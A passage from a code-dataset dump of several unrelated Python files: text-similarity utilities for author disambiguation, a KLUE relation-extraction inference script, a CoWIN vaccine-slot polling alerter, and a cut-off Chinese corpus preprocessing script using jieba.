s2_set.intersection(SPECIAL_PUBLICATION_WORDS)\n if len(s1_special_overlap) == 0 and len(s2_special_overlap) == 0:\n return NUMPY_NAN\n else:\n return s1_special_overlap == s2_special_overlap\n\n\ndef prefix_dist_helper(min_word: str, max_word: str) -> float:\n min_len = len(min_word)\n for i in range(min_len, 0, -1):\n if min_word[:i] == max_word[:i]:\n return 1 - (i / min_len)\n return 1.0\n\n\ndef prefix_dist(string_1: str, string_2: str) -> float:\n if string_1 is None or pd.isnull(string_1) or string_2 is None or pd.isnull(string_2):\n return NUMPY_NAN\n if string_1 == string_2:\n return 0.0\n # sometimes there is a small diff in the first\n min_word, max_word = (string_1, string_2) if len(string_1) < len(string_2) else (string_2, string_1)\n return min(prefix_dist_helper(min_word, max_word), prefix_dist_helper(min_word[::-1], max_word[::-1]))\n\n\nTEXT_FUNCTIONS = [\n (jellyfish.levenshtein_distance, \"levenshtein\"),\n (prefix_dist, \"prefix\"),\n (jellyfish.jaro_winkler_similarity, \"jaro\"),\n]\n\n\ndef normalize_text(text: Optional[str], special_case_apostrophes_and_dashes: bool = False) -> str:\n \"\"\"\n Normalize text.\n\n Parameters\n ----------\n text: string\n the text to normalize\n special_case_apostrophie: bool\n whether to replace apostrophes with empty strings rather than spaces\n\n Returns\n -------\n string: the normalized text\n \"\"\"\n if text is None or len(text) == 0:\n return \"\"\n\n # if there is the possibility of latex\n # we can convert it to text\n if \"\\\\\" in text or text.count(\"$\") > 1:\n try:\n text = latex_to_text(text)\n except IndexError as e:\n logger.debug(f\"Failed to convert latex to text with: {text} and error {e}\")\n norm_text = unidecode(text).lower()\n\n if special_case_apostrophes_and_dashes:\n norm_text = norm_text.replace(\"'\", \"\")\n norm_text = RE_DASHES.sub(\"\", norm_text)\n\n norm_text = RE_NORMALIZE_WHOLE_NAME.sub(\" \", norm_text)\n norm_text = RE_SPACES.sub(\" \", norm_text).strip()\n\n return norm_text\n\n\ndef normalize_venue_name(s: str) -> str:\n if pd.isnull(s) or len(s) == 0:\n return \"\"\n\n s = unidecode(s) # Remove diacritics\n s = s.lower()\n s = RE_DASHES.sub(\"-\", s) # Normalize dashes\n s = RE_APOSTRAPHE_S.sub(r\"\\1s\", s)\n s = s.translate(REMOVE_PUNC) # Remove punctuation\n s = RE_SPACES.sub(\" \", s).strip() # Collapse whitespace\n words = s.split(\" \")\n s = \" \".join(\n WORD_REPLACEMENTS.get(word, word) for word in words\n ) # Replace terms with equivalents, remove stop-words\n s = RE_SPACES.sub(\" \", s).strip() # Collapse whitespace again\n\n return s\n\n\ndef name_text_features(\n name_1: str,\n name_2: str,\n default_val: float = NUMPY_NAN,\n) -> List[float]:\n \"\"\"\n Computes various text similarity features for two names\n\n Parameters\n ----------\n name_1: string\n the first name\n name_2: string\n the second name\n default_val: float\n the default value to return when one or both of the names is empty\n\n Returns\n -------\n List[float]: a list of the various similarity scores for the two names\n \"\"\"\n scores = []\n if name_1 is None or name_2 is None or len(name_1) <= 1 or len(name_2) <= 1:\n return [default_val] * len(TEXT_FUNCTIONS)\n\n for function, function_name in TEXT_FUNCTIONS:\n score = function(name_1, name_2)\n if function_name in {\"levenshtein\"}:\n score = score / max(len(name_1), len(name_2))\n scores.append(score)\n return scores\n\n\ndef cosine_sim(a: np.ndarray, b: np.ndarray) -> float:\n \"\"\"\n Computes the cosine similarity between two vectors\n\n Parameters\n ----------\n a: np.ndarray\n the first vector\n b: np.ndarray\n the second vector\n\n Returns\n -------\n float: the cosine similarity of the two vectors\n \"\"\"\n a_norm = norm(a)\n b_norm = norm(b)\n if a_norm == 0 or b_norm == 0:\n return 0\n else:\n return inner(a, b) / (a_norm * b_norm)\n\n\ndef get_text_ngrams(\n text: Optional[str],\n use_unigrams: bool = False,\n use_bigrams: bool = True,\n stopwords: Optional[Set[str]] = STOPWORDS,\n) -> Counter:\n \"\"\"\n Get character bigrams, trigrams, quadgrams, and optionally unigrams for a piece of text.\n Note: respects word boundaries\n\n Parameters\n ----------\n text: string\n the text to get ngrams for\n use_unigrams: bool\n whether or not to include unigrams\n stopwords: Set\n The set of stopwords to filter out before computing character ngrams\n\n Returns\n -------\n Counter: the ngrams present in the text\n \"\"\"\n if text is None or len(text) == 0:\n return Counter()\n\n if stopwords is not None:\n text = \" \".join([word for word in text.split(\" \") if word not in stopwords])\n\n unigrams = [] # type: ignore\n if use_unigrams:\n unigrams = filter(lambda x: \" \" not in x, text) # type: ignore\n\n bigrams = [] # type: ignore\n if use_bigrams:\n bigrams = map( # type: ignore\n lambda x: \"\".join(x),\n filter(lambda x: \" \" not in x, zip(text, text[1:])),\n )\n\n trigrams = map(\n lambda x: \"\".join(x),\n filter(lambda x: \" \" not in x, zip(text, text[1:], text[2:])),\n )\n\n quadgrams = map(\n lambda x: \"\".join(x),\n filter(lambda x: \" \" not in x, zip(text, text[1:], text[2:], text[3:])),\n )\n ngrams = Counter(unigrams) | Counter(bigrams) | Counter(trigrams) | Counter(quadgrams)\n return ngrams\n\n\ndef get_text_ngrams_words(text: Optional[str], stopwords: Optional[Set[str]] = STOPWORDS) -> Counter:\n \"\"\"\n Get word unigrams, bigrams, and trigrams for a piece of text.\n\n Parameters\n ----------\n text: string\n the text to get ngrams for\n stopwords: Set\n The set of stopwords to filter out before computing word ngrams\n\n Returns\n -------\n Counter: the ngrams present in the text\n \"\"\"\n if text is None or len(text) == 0:\n return Counter()\n if stopwords is not None:\n text_split = [word for word in text.split() if word not in stopwords]\n else:\n text_split = text.split()\n unigrams = Counter(text_split)\n bigrams = map(\n lambda x: \" \".join(x),\n zip(text_split, text_split[1:]),\n )\n trigrams = map(\n lambda x: \" \".join(x),\n zip(text_split, text_split[1:], text_split[2:]),\n )\n ngrams = unigrams | Counter(bigrams) | Counter(trigrams)\n return ngrams\n\n\ndef equal(\n name_1: Optional[str],\n name_2: Optional[str],\n default_val: float = NUMPY_NAN,\n) -> Union[int, float]:\n \"\"\"\n Check if two names are exactly equal after lowercasing\n\n Parameters\n ----------\n name_1: string\n the first name\n name_2: string\n the second name\n default_val: float\n the default value to return when one or both of the names is empty\n\n Returns\n -------\n int: 0 (if unequal) or 1 (if equal)\n \"\"\"\n if name_1 is None or name_2 is None or len(name_1) == 0 or len(name_2) == 0:\n return default_val\n\n if name_1 == \"-\" or name_2 == \"-\":\n return default_val\n\n if name_1.lower().strip() == name_2.lower().strip():\n return 1\n else:\n return 0\n\n\ndef equal_middle(\n name_1: Optional[str],\n name_2: Optional[str],\n default_val: float = NUMPY_NAN,\n) -> Union[int, float]:\n \"\"\"\n Checks if two middle names are equal. If either middle name is just an initial,\n just check euqality of initials\n\n Parameters\n ----------\n name_1: string\n first middle name string\n name_2: string\n second middle name string\n default_val: float\n the default value to return when one or both of the names is empty\n\n Returns\n -------\n int: 0 (if unequal) or 1 (if equal)\n \"\"\"\n if name_1 is None or name_2 is None or len(name_1) == 0 or len(name_2) == 0:\n return default_val\n\n if len(name_1) == 1 or len(name_2) == 1:\n if name_1[0] == name_2[0]:\n return 1\n\n elif name_1 == name_2:\n return 1\n\n return 0\n\n\ndef equal_initial(\n name_1: Optional[str],\n name_2: Optional[str],\n default_val: float = NUMPY_NAN,\n) -> Union[int, float]:\n \"\"\"\n Checks if two initials are qual\n\n Parameters\n ----------\n name_1: string\n first initial\n name_2: string\n second initial\n default_val: float\n the default value to return when one or both of the names is empty\n\n Returns\n -------\n int: 0 (if unequal) or 1 (if equal)\n \"\"\"\n if name_1 is None or name_2 is None or len(name_1) == 0 or len(name_2) == 0:\n return default_val\n\n if name_1.strip().lower()[0] == name_2.strip().lower()[0]:\n return 1\n else:\n return 0\n\n\ndef counter_jaccard(\n counter_1: Counter,\n counter_2: Counter,\n default_val: float = NUMPY_NAN,\n denominator_max: float = np.inf,\n) -> float:\n \"\"\"\n Computes jaccard overlap between two Counters\n\n Parameters\n ----------\n counter_1: Counter\n first Counter\n counter_2: Counter\n second Counter\n default_val: float\n the default value to return when one or both of the Counters is empty\n\n Returns\n -------\n float: the jaccard overlap\n \"\"\"\n if len(counter_1) == 0 or len(counter_2) == 0:\n return default_val\n\n intersection_sum = sum((counter_1 & counter_2).values())\n union_sum = sum(counter_1.values()) + sum(counter_2.values()) - intersection_sum\n score = intersection_sum / min(union_sum, denominator_max)\n return min(score, 1)\n\n\ndef jaccard(\n set_1: Set,\n set_2: Set,\n default_val: float = NUMPY_NAN,\n) -> float:\n \"\"\"\n Computes jaccard overlap between two sets\n\n Parameters\n ----------\n set_1: Set\n first Set\n set_2: Set\n second Set\n default_val: float\n the default value to return when one or both of the Sets is empty\n\n Returns\n -------\n float: the jaccard overlap\n \"\"\"\n if len(set_1) == 0 or len(set_2) == 0:\n return default_val\n\n score = len(set_1.intersection(set_2)) / (len(set_1.union(set_2)))\n return score\n\n\ndef diff(value_1: Optional[float], value_2: Optional[float], default_val: float = NUMPY_NAN) -> float:\n \"\"\"\n Compute absolute difference between two values.\n\n Parameters\n ----------\n value_1: float\n first value\n value_2: float\n second value\n default_val: float\n the default value to return when one or both of the values is empty\n\n Returns\n -------\n float: absolute difference\n \"\"\"\n if value_1 is None or value_2 is None:\n return default_val\n\n return abs(float(value_1) - float(value_2))\n\n\ndef name_counts(\n counts_1: \"NameCounts\",\n counts_2: \"NameCounts\",\n) -> List[Union[int, float]]:\n \"\"\"\n Gets name counts for first, last, and first_last names.\n These counts were computed from the entire S2 corpus.\n\n Parameters\n ----------\n counts_1: NameCounts\n first NameCounts\n counts_2: NameCounts\n second NameCounts\n\n Returns\n -------\n List[int]: min/max for first, first_last, and min for last, last_first_initial\n \"\"\"\n counts = []\n counts.append([counts_1.first, counts_1.first_last, counts_1.last, counts_1.last_first_initial]) # can be nan\n counts.append([counts_2.first, counts_2.first_last, counts_2.last, counts_2.last_first_initial]) # can be nan\n # using nanmin so as to catch the min of counts, but regular max to propagate the nan\n with warnings.catch_warnings():\n # np.max of 2 nans causes annoying warnings\n warnings.simplefilter(\"ignore\", category=RuntimeWarning)\n counts_min_max = list(np.nanmin(counts, axis=0)) + list(np.max([counts[0][:2], counts[1][:2]], axis=0))\n\n return counts_min_max\n","repo_name":"allenai/S2APLER","sub_path":"s2apler/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":19820,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"18305200991","text":"from transformers import (\n AutoTokenizer,\n AutoConfig,\n AutoModelForSequenceClassification,\n Trainer,\n TrainingArguments,\n BertTokenizer,\n)\nfrom torch.utils.data import DataLoader\nfrom load_data import *\nfrom modules.preprocessor import EntityPreprocessor, SenPreprocessor, UnkPreprocessor\nimport pandas as pd\nimport torch\nimport torch.nn.functional as F\nimport importlib\n\nimport pickle as pickle\nimport numpy as np\nimport argparse\nimport os\nfrom tqdm import tqdm\nfrom tokenization import *\n\n\ndef inference(model, tokenized_sent, device, args, is_roberta=False):\n dataloader = DataLoader(tokenized_sent, batch_size=16, shuffle=False)\n model.eval()\n\n output_pred = []\n output_prob = []\n for data in tqdm(dataloader):\n with torch.no_grad():\n if args.model_name == \"Rroberta\":\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n e1_mask=data[\"e1_mask\"].to(device),\n e2_mask=data[\"e2_mask\"].to(device),\n )\n elif is_roberta:\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n )\n else:\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n token_type_ids=data[\"token_type_ids\"].to(device),\n )\n logits = outputs[0]\n prob = F.softmax(logits, dim=-1).detach().cpu().numpy()\n logits = logits.detach().cpu().numpy()\n result = np.argmax(logits, axis=-1)\n\n output_pred.append(result)\n output_prob.append(prob)\n\n return (\n np.concatenate(output_pred).tolist(),\n np.concatenate(output_prob, axis=0).tolist(),\n )\n\n\ndef inference_ensemble(model_dir, tokenized_sent, device, args, is_roberta=False):\n dataloader = DataLoader(tokenized_sent, batch_size=16, shuffle=False)\n\n dirs = os.listdir(model_dir)\n dirs = sorted(dirs)\n\n final_output_prob, final_output_pred = [], []\n for i in range(len(dirs)):\n model_d = os.path.abspath(os.path.join(model_dir, dirs[i]))\n if args.model_name is not None:\n model_config = AutoConfig.from_pretrained(args.PLM)\n model_config.num_labels = 30\n mm = importlib.import_module(\"model\")\n MyModel = getattr(mm, args.model_name)\n\n if MyModel.__name__ == \"ConcatFourClsModel\":\n model_config.update({\"output_hidden_states\": True})\n\n model = MyModel(args.PLM, config=model_config)\n model.load_state_dict(torch.load(os.path.join(model_d, \"pytorch_model.pt\")))\n else:\n model = AutoModelForSequenceClassification.from_pretrained(model_d)\n\n model.eval()\n model.to(device)\n\n fold_prob = []\n fold_pred = []\n for data in tqdm(dataloader):\n with torch.no_grad():\n if args.model_name == \"Rroberta\":\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n e1_mask=data[\"e1_mask\"].to(device),\n e2_mask=data[\"e2_mask\"].to(device),\n )\n elif is_roberta:\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n )\n else:\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n token_type_ids=data[\"token_type_ids\"].to(device),\n )\n logits = outputs[0]\n prob = F.softmax(logits, dim=-1).detach().cpu().numpy()\n logits = logits.detach().cpu().numpy()\n\n fold_pred.extend(logits.tolist())\n fold_prob.append(prob)\n\n final_output_pred.append(fold_pred)\n final_output_prob.append(np.concatenate(fold_prob, axis=0).tolist())\n\n return final_output_pred, final_output_prob\n\n\npers_id_index = {\n 0: 4,\n 1: 6,\n 2: 8,\n 3: 10,\n 4: 11,\n 5: 12,\n 6: 13,\n 7: 14,\n 8: 15,\n 9: 16,\n 10: 17,\n 11: 21,\n 12: 23,\n 13: 24,\n 14: 25,\n 15: 26,\n 16: 27,\n 17: 29,\n}\norgs_id_index = {0: 1, 1: 2, 2: 3, 3: 5, 4: 7, 5: 9, 6: 18, 7: 19, 8: 20, 9: 22, 10: 28}\n\n\ndef inference_three_step(model_dir, Re_test_dataset, device, args, is_roberta):\n \"\"\"\n 대분류(no_relation, org, per 분류) -> 소분류(per 관련 label 세부 분류), 소분류(org 관련 label 세부 분류) 진행\n \"\"\"\n dataloader = DataLoader(Re_test_dataset, batch_size=16, shuffle=False)\n\n dirs = os.listdir(model_dir)\n dirs = sorted(dirs)\n\n # 최종값 저장할 list\n final_output_prob = [[0] * 30] * 7765\n final_output_pred = [31] * 7765\n\n # 대분류 시, 분류된 각 label을 저장할 lsit\n no_relation_index, per_index, org_index = [], [], []\n\n ## 대분류 시작 ##\n fold_big_prob, fold_big_pred = [], []\n\n ## per관련 label 예측 시작 ##\n fold_per_prob, fold_per_pred = [], []\n\n # org 관련 label 예측 시작!\n fold_org_prob, fold_org_pred = [], []\n\n for what_model in dirs:\n print(what_model)\n model_d = os.path.abspath(os.path.join(model_dir, what_model))\n # big sort 관련 모델을 불러옵니다! (대분류 시에 모델 이름이 big이라는 단어가 들어가야 수행 가능!)\n prob = []\n pred = []\n\n if \"big\" in what_model:\n model_config.num_labels = 3\n elif \"per\" in what_model:\n model_config.num_labels = 18\n else:\n model_config.num_labels = 11\n\n if args.model_name is not None:\n model_config = AutoConfig.from_pretrained(args.PLM)\n mm = importlib.import_module(\"model\")\n MyModel = getattr(mm, args.model_name)\n\n if MyModel.__name__ == \"ConcatFourClsModel\":\n model_config.update({\"output_hidden_states\": True})\n\n model = MyModel(args.PLM, config=model_config)\n model.load_state_dict(torch.load(os.path.join(model_d, \"pytorch_model.pt\")))\n\n else:\n model = AutoModelForSequenceClassification.from_pretrained(model_d)\n model.parameters\n model.to(device)\n\n model.eval()\n for data in tqdm(dataloader):\n with torch.no_grad():\n if is_roberta:\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n )\n else:\n outputs = model(\n input_ids=data[\"input_ids\"].to(device),\n attention_mask=data[\"attention_mask\"].to(device),\n token_type_ids=data[\"token_type_ids\"].to(device),\n )\n logits = outputs[0]\n prob = F.softmax(logits, dim=-1).detach().cpu().numpy()\n logits = logits.detach().cpu().numpy()\n result = np.argmax(logits, axis=-1)\n\n pred.extend(logits.tolist())\n prob.append(prob)\n\n if \"big\" in what_model:\n fold_big_pred.append(pred)\n fold_big_prob.append(np.concatenate(prob, axis=0).tolist())\n\n elif \"per\" in what_model:\n fold_per_pred.append(pred)\n fold_per_prob.append(np.concatenate(prob, axis=0).tolist())\n\n else:\n fold_org_pred.append(pred)\n fold_org_prob.append(np.concatenate(prob, axis=0).tolist())\n\n fold_big_pred = np.argmax(np.mean(fold_big_pred, axis=0), axis=-1)\n fold_big_prob = np.mean(fold_big_prob, axis=0).tolist()\n\n fold_per_pred = np.argmax(np.mean(fold_per_pred, axis=0), axis=-1)\n fold_per_prob = np.mean(fold_per_prob, axis=0).tolist()\n\n fold_org_pred = np.argmax(np.mean(fold_org_pred, axis=0), axis=-1)\n fold_org_prob = np.mean(fold_org_prob, axis=0).tolist()\n\n ## no_relation, per, org 분류값 저장 -> no_relation만 최종 값에 저장\n for idx in range(7765):\n idx_prob = []\n if fold_big_pred[idx] == 0:\n final_output_pred[idx] = 0\n idx_prob.append(fold_big_prob[idx][0])\n for c in range(1, 30):\n if c in pers_id_index.values():\n idx_prob.append((fold_big_prob[idx][1]) / 18)\n else:\n idx_prob.append((fold_big_prob[idx][2]) / 11)\n final_output_prob[idx] = idx_prob\n\n elif fold_big_pred[idx] == 1:\n idx_prob = [0] * 30\n final_output_pred[idx] = orgs_id_index[fold_org_pred[idx]]\n # org 관련 확률값 저장\n for orgsid in orgs_id_index.keys():\n idx_prob[orgs_id_index[orgsid]] = fold_org_prob[idx][orgsid]\n\n # org랑 상관없는 값 저장\n for i in range(30):\n if idx_prob[i] == 0:\n idx_prob[i] = min(fold_org_prob[idx]) / 19\n final_output_prob[idx] = idx_prob\n\n else:\n idx_prob = [0] * 30\n final_output_pred[idx] = pers_id_index[fold_per_pred[idx]]\n # per 관련 확률값 저장\n for persid in pers_id_index.keys():\n idx_prob[pers_id_index[persid]] = fold_per_prob[idx][persid]\n\n # per랑 상관없는 확률값 저장\n for i in range(30):\n if idx_prob[i] == 0:\n idx_prob[i] = min(fold_per_prob[idx]) / 12\n final_output_prob[idx] = idx_prob\n\n return final_output_pred, final_output_prob\n\n\ndef num_to_label(label):\n \"\"\"\n 숫자로 되어 있던 class를 원본 문자열 라벨로 변환 합니다.\n \"\"\"\n origin_label = []\n with open(\"dict_num_to_label.pkl\", \"rb\") as f:\n dict_num_to_label = pickle.load(f)\n for v in label:\n origin_label.append(dict_num_to_label[v])\n\n return origin_label\n\n\ndef load_test_dataset(dataset_dir, tokenizer, sen_preprocessor, entity_preprocessor):\n \"\"\"\n test dataset을 불러온 후,\n tokenizing 합니다.\n \"\"\"\n test_dataset = load_data(dataset_dir, train=False)\n test_dataset = preprocessing_dataset(\n test_dataset, sen_preprocessor, entity_preprocessor\n )\n test_label = list(map(int, test_dataset[\"label\"].values))\n\n # tokenizing dataset\n tokenized_test = tokenized_dataset(test_dataset, tokenizer, is_inference=True)\n return test_dataset[\"id\"], tokenized_test, test_label\n\n\ndef select_checkpoint(args):\n models_dir = args.model_dir\n dirs = os.listdir(models_dir)\n dirs = sorted(dirs)\n\n for i, d in enumerate(dirs, 0):\n print(\"(%d) %s\" % (i, d))\n d_idx = input(\"Select directory you want to load: \")\n\n checkpoint_dir = os.path.abspath(os.path.join(models_dir, dirs[int(d_idx)]))\n print(\"checkpoint_dir is: {}\".format(checkpoint_dir))\n\n return checkpoint_dir\n\n\ndef main(args):\n \"\"\"\n 주어진 dataset csv 파일과 같은 형태일 경우 inference 가능한 코드입니다.\n \"\"\"\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n # load tokenizer\n tokenizer = AutoTokenizer.from_pretrained(args.PLM)\n\n # load my model\n model_dir = select_checkpoint(args)\n\n # load test datset\n test_dataset_dir = \"/opt/ml/dataset/test/test_data.csv\"\n\n # preprocessor\n sen_preprocessor = SenPreprocessor(args.preprocessing_cmb, args.mecab_flag)\n entity_preprocessor = EntityPreprocessor(\n args.entity_flag if args.model_name != \"Rroberta\" else True\n )\n\n if args.PLM in [\"klue/roberta-base\", \"klue/roberta-small\", \"klue/roberta-large\"]:\n is_roberta = True\n if args.add_unk_token:\n print(model_dir + \"/tokenizer\")\n tokenizer = BertTokenizer.from_pretrained(model_dir + \"/tokenizer\")\n print(\n \"new vocab size:\",\n len(tokenizer.vocab) + len(tokenizer.get_added_vocab()),\n )\n else:\n is_roberta = False\n\n test_id, test_dataset, test_label = load_test_dataset(\n test_dataset_dir, tokenizer, sen_preprocessor, entity_preprocessor\n )\n Re_test_dataset = (\n RE_Dataset(test_dataset, test_label)\n if args.model_name != \"Rroberta\"\n else DatasetForRRoBERTa(test_dataset, test_label, tokenizer)\n )\n\n if args.model_type:\n pred_answer, output_prob = inference_three_step(\n model_dir, Re_test_dataset, device, args, is_roberta\n ) # model에서 class 추론\n pred_answer = num_to_label(pred_answer)\n\n elif args.k_fold:\n pred_answer, output_prob = inference_ensemble(\n model_dir, Re_test_dataset, device, args, is_roberta\n ) # model에서 class 추론\n pred_answer = np.mean(pred_answer, axis=0)\n pred_answer = np.argmax(pred_answer, axis=-1)\n pred_answer = num_to_label(pred_answer)\n output_prob = np.mean(output_prob, axis=0).tolist()\n\n else:\n if args.model_name is not None:\n model_config = AutoConfig.from_pretrained(args.PLM)\n model_config.num_labels = 30\n mm = importlib.import_module(\"model\")\n MyModel = getattr(mm, args.model_name)\n\n if MyModel.__name__ == \"ConcatFourClsModel\":\n model_config.update({\"output_hidden_states\": True})\n\n model = MyModel(args.PLM, config=model_config)\n model.load_state_dict(\n torch.load(os.path.join(model_dir, \"pytorch_model.pt\"))\n )\n else:\n model = AutoModelForSequenceClassification.from_pretrained(model_dir)\n model.parameters\n model.to(device)\n\n pred_answer, output_prob = inference(\n model, Re_test_dataset, device, args, is_roberta\n ) # model에서 class 추론\n pred_answer = num_to_label(pred_answer) # 숫자로 된 class를 원래 문자열 라벨로 변환.\n\n # make csv file with predicted answer\n #########################################################\n # 아래 directory와 columns의 형태는 지켜주시기 바랍니다.\n output = pd.DataFrame(\n {\n \"id\": test_id,\n \"pred_label\": pred_answer,\n \"probs\": output_prob,\n }\n )\n\n sub_name = model_dir.split(\"/\")[-1]\n # 최종적으로 완성된 예측한 라벨 csv 파일 형태로 저장.\n output.to_csv(f\"./prediction/submission_{sub_name}.csv\", index=False)\n #### 필수!! ##############################################\n print(\"---- Finish! ----\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n\n # model dir\n parser.add_argument(\"--model_dir\", type=str, default=\"./best_models\")\n parser.add_argument(\n \"--PLM\", type=str, help=\"model type (example: klue/bert-base)\", required=True\n )\n parser.add_argument(\n \"--entity_flag\",\n default=False,\n action=\"store_true\",\n help=\"Train에 사용했던거랑 똑같이 (default: False)\",\n )\n parser.add_argument(\n \"--preprocessing_cmb\", nargs=\"+\", help=\"<Required> Set flag (example: 0 1 2)\"\n )\n parser.add_argument(\n \"--mecab_flag\",\n default=False,\n action=\"store_true\",\n help=\"Train에 사용했던거랑 똑같이 (default: False)\",\n )\n parser.add_argument(\n \"--add_unk_token\",\n default=False,\n action=\"store_true\",\n help=\"add unknown token in vocab (default: False)\",\n )\n parser.add_argument(\"--k_fold\", type=int, default=0, help=\"not k fold(defalut: 0)\")\n parser.add_argument(\n \"--model_name\",\n type=str,\n default=None,\n help=\"if want, you have to enter your model class name\",\n )\n parser.add_argument(\n \"--model_type\",\n default=False,\n action=\"store_true\",\n help=\"(default: False - 대분류/소분류 X)\",\n )\n\n args = parser.parse_args()\n print(args)\n\n os.makedirs(\"./prediction\", exist_ok=True)\n main(args)\n","repo_name":"boostcampaitech2/klue-level2-nlp-02","sub_path":"inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":16417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25269713292","text":"import requests\nimport json\nfrom datetime import datetime, timedelta\nimport time\nfrom playsound import playsound\n\ndate = f\"{datetime.now()+timedelta(days = 1) :%d-%m-%Y}\"\npincodes = [ 411001, 411007, 411017, 411018, 411027, 411033, 411034 ]\n\napi = 'https://cdn-api.co-vin.in/api/v2/appointment/sessions/calendarByDistrict?district_id=363&date='+date\nheaders={'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\nprint(api)\ncount = 0\nerror_count = 0\nstart = time.time()\nwhile True:\n try:\n response = requests.get(api, headers=headers).json()\n for center in response['centers']:\n for session in center['sessions']:\n if session['min_age_limit'] == 18 and session['available_capacity'] > 0:\n print(center['name'])\n print(center['address'])\n print(session['available_capacity'])\n playsound('S:\\\\Projects\\\\vaccine-alert\\\\alarm.wav')\n except Exception as e:\n error_count += 1\n print(e, error_count)\n count += 1\n if count%100 == 0:\n print(count, 'times run, last batch took', int(time.time()-start), 'seconds')\n start = time.time()","repo_name":"sudheendrakatikar/vaccine-alerter","sub_path":"alerter.py","file_name":"alerter.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41649217299","text":"import codecs\nimport jieba\nimport jieba.posseg as pseg\nimport random\n\nclass CorpusFormat(object):\n\n relation_table = {\"cs-ef\":0,\"ef-cs\":1,\n \"identity\":2,\n \"way-obj\":3,\"obj-way\":4,\n \"en-or\":5,\"or-en\":6,\n \"other\":7,\n \"loc-aA\":8,\"loc-Aa\":9,\n \"clsaA\":10,\"clsAa\":11,\n \"w-c\":12,\"c-w\":13,\n \"related\":14,\n \"pdr-pdt\":15,\"pdt-pdr\":16,\n \"ag-ins\":17,\"ins-ag\":18,\n \"med-ill\":19,\"ill-med\":20,\n \"top-msg\":21,\"msg-top\":21\n }\n\n def freq_tag(self,word):\n freq = jieba.get_FREQ(word)\n tag = \"\"\n if freq is not None:\n tag = pseg.lcut(word,HMM=False)[0].flag\n return freq,tag\n\n def recover_dict(self,word,freq,tag):\n if freq is None:\n jieba.del_word(word)\n else:\n jieba.add_word(word, freq=freq, tag=tag)\n\n def word_divide(self,inputfiles,outputfile):\n outputs = []\n relations = {}\n for file in inputfiles:\n with codecs.open(file,\"r\",\"utf8\") as read:\n lines = read.readlines()\n for line in lines:\n if line == \"\\n\":\n continue\n line = line.replace(\"<Entity>\", \"\")\n line = line.replace(\"</Entity>\", \"\")\n line = line.replace(\"<kej>\", \"\")\n line = line.replace(\"</kej>\", \"\")\n line = line.replace(\" \",\"\").strip()\n temps = line.split(\"\\t\")\n if len(temps)!=4:\n print(\"wrong\")\n relation = temps[0]\n entity1 = temps[1]\n freq1,tag1 = self.freq_tag(entity1)\n jieba.add_word(entity1,freq = 1000000,tag = \"kej\")\n entity2 = temps[2]\n freq2, tag2 = self.freq_tag(entity2)\n jieba.add_word(entity2, freq=1000000, tag=\"kej\")\n words = jieba.lcut(temps[3])\n sentence = \"\"\n # sentence_label = \"\"\n seq1 = []\n seq2 = []\n pos1 = \"\"\n pos2 = \"\"\n for word in words:\n if word == \" \":\n continue\n sentence += word\n sentence += \" \"\n sentence = sentence.strip()\n words = sentence.split(\" \")\n for i in range(len(words)):\n if words[i] == entity1:\n seq1.append(i)\n if words[i] == entity2:\n seq2.append(i)\n for item in seq1:\n pos1 += (str(item) + \" \")\n for item in seq2:\n pos2 += (str(item) + \" \")\n pos1 = pos1.strip()\n pos2 = pos2.strip()\n sentence = sentence\n # sentence_label = sentence_label.strip()\n if pos1 == \"\" or pos2 == \"\":\n print(\"分词错误\" + entity1,entity2,sentence)\n else:\n if relation not in relations:\n relations[relation] = 1\n else:\n relations[relation] += 1\n outputs.append(relation + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n self.recover_dict(entity1,freq1,tag1)\n self.recover_dict(entity2, freq2, tag2)\n print(relations)\n with codecs.open(outputfile,\"w\",\"utf8\") as file:\n file.writelines(outputs)\n\n\n def change_order(self,inputfile,outputfile):\n outputs = []\n with codecs .open(inputfile,\"r\",\"utf8\") as file:\n lines = file.readlines()\n for line in lines:\n temps = line.split(\"\\t\")\n if len(temps) != 4:\n print(\"wrong\")\n relation = temps[0]\n pos1 = temps[1]\n pos2 = temps[2]\n sentence = temps[3].strip()\n if relation == \"cause-effect\":\n outputs.append(\"cs-ef\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"ef-cs\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"cs-ef\":\n outputs.append(\"cs-ef\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"ef-cs\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"classify\":\n outputs.append(\"clsaA\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n outputs.append(\"clsAa\" + \"\\t\" + pos2 + \"\\t\" + pos1 + \"\\t\" + sentence + \"\\n\")\n elif relation == \"identity\":\n outputs.append(\"idnetity\" + \"\\t\" + pos1 + \"\\t\" + pos2 + \"\\t\" + sentence + \"\\n\")\n elif relation 